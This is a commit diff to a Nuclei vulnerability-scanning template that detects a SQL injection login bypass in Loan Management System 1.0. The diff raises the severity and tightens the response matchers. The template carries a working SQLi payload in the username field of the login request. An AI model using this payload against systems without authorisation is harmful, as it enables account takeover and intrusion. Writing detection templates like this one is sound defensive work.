Update loancms-sqli.yaml

vulnerabilities/other/loancms-sqli.yaml

@@ -3,12 +3,12 @@ id: loancms-sqli
 info:
   name: Loan Management System 1.0 - SQLi Authentication Bypass
   author: arafatansari
-  severity: medium
-  reference:
-    - https://www.exploit-db.com/exploits/50402
+  severity: high
   description: |
     Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
-  tags: sqli,bypass,cms
+  reference:
+    - https://www.exploit-db.com/exploits/50402
+  tags: loancms,sqli,bypass,cms
 
 requests:
   - raw:
@@ -19,18 +19,22 @@ requests:
 
         username=admin'+or+'1'%3D'1'%23&password=nuclei
 
+      - |
+        GET /index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '1'
+          - 'window.start_load'
+          - 'Welcome back'
+          - 'Loan Management System'
+        condition: and  
 
       - type: word
-        part: header
+        part: body
         words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
+          - 'login-form'
+        negative: true